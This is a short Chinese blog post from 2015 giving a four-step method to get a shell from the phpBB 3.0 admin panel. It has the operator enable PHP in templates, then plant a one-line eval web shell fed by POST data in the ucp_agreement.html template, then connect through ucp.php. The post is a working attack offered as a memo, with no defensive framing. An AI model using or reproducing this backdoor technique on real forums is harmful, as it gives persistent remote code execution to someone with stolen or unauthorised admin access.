注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

phpbb3.0后台getshell  

2015-01-11 09:57:09|  分类: CMS |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
没啥好说的,应某位管理要求发上来权当备忘录。

网上也有一堆类似的后台getshell,看到一个代码有点问题,稍作修改可拿权限


切入正题:

step1

进后台-综合-安全设置-在模板中允许PHP打开,这样html内php就可以执行了。

step2

在综合-论坛设定-默认模板确定当前模板风格

step3

在 风格-模板-html中选择已知相关包含的html,这里我选择的ucp_agreement.html。
在模板中直接插入以下代码保存:
  1. <!-- PHP -->
  2. @eval($_POST[cmd]);
  3. <!-- ENDPHP -->
复制代码
step4
直接连ucp.php得shell,打完收功。
  评论这张
 
阅读(109)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017